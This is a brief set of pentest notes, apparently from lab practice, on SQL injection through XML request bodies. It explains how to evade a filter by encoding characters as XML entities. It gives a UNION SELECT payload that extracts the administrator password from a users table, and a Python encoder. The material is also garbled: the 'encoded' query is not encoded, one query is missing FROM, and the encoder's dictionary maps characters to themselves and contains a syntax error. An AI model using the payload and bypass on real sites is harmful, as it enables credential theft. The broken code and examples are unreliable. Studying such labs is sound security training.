XML

Steps

  • Capture the request from BrupSuite (displaying some sort of XML)

  • Find the number of column (You can simply guest from the output of the original request)

  • trying to bypass some filter, you might see that simply encoding the request (URL might not work, this is because XML use a specific encoding (More information ---> HERE (opens in a new tab)))

    • Also, here we are trying to encode character (this is different then simple url encoding)
    • Using (&#xCHARACTER;), we can see that SQL injection is valid

Query Example

#Not Encoded
4 UNION SELECT password WHERE username='administator'-- 

$Encoded
4 UNION SELECT password FROM users WHERE username='administrator'-- 

Tool (Python)

XML encoder (Possible to modify it to encode character)

import xml.sax.saxutils

# Define the string to be encoded
string = "this is a string to be XML encoded"

# Encode the string using the escape() method
encoded_string = xml.sax.saxutils.escape(string, {
    "'": "'",  # Single quote
    '"': """,  # Double quote
    "&": "&",  # Ampersand
    "<": "&#x3c;",  # Less than
    ">": "&#x3e;",  # Greater than
    " ": "&#x20;"   # Space
})

# Print the encoded string
print(encoded_string)